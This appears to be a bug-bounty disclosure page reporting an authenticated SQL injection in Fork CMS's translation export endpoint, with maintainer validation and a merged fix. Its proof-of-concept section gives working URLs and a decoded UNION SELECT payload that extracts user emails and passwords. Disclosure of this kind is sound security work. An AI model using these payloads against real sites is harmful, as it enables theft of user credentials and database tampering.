SQL Injection in forkcms/forkcms

Valid

Reported on

Oct 21st 2021


Description

When an authenticated user exports translations, the user calls an URL like this: http://forkcms.site/private/de/locale/export?token=5z0ao1nk4p&type%5B0%5D=lbl&language%5B0%5D=de The parameter type[0] and language[0] are both vulnerable for SQL injection.

Proof of Concept

PoC for parameter type[0]

  • As an authenticated user, call the URL
http://forkcms.site/private/de/locale/export?token=2m4a1w19v6&type[0]=lb%27)%20union%20select%20users.is_god,TO_BASE64(users.email),%27de2%27,%27de5%27,%27de3%27,%27de4%27,TO_BASE64(users.password)%20from%20users%20--+&language[0]=de
  • In this case, you should get an xml with the users and passwords from users table (base64 encoded).
  • The SQL Injection decoded looks like this
') union select users.is_god,TO_BASE64(users.email),'de2','de5','de3','de4',TO_BASE64(users.password) from users --+

PoC for parameter language[0]

  • As an authenticated user, call the URL
http://forkcms.site/private/de/locale/export?token=2m4a1w19v6&type[0]=lbl&language[0]=de%27)%20union%20select%20users.is_god,TO_BASE64(users.email),%27de2%27,%27de5%27,%27de3%27,%27de4%27,TO_BASE64(users.password)%20from%20users%20--+
  • In this case, you should get an xml with all translations, but also with users and passwords at the end of the file (base64 encoded).
  • The SQL injection payload decoded looks like this:
') union select users.is_god,TO_BASE64(users.email),'de2','de5','de3','de4',TO_BASE64(users.password) from users --+

Impact

An attacker can steal or tamper data in the database.

We have contacted a member of the forkcms team and are waiting to hear back 7 months ago
Jelmer Prins validated this vulnerability 7 months ago
starkitsec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins
7 months ago

Maintainer


Good catch, thank you for reporting this one

Jelmer Prins
2 months ago

Maintainer


fix is currently in review

Jelmer Prins confirmed that a fix has been merged on 3710cb 2 months ago
Jelmer Prins has been awarded the fix bounty
to join this conversation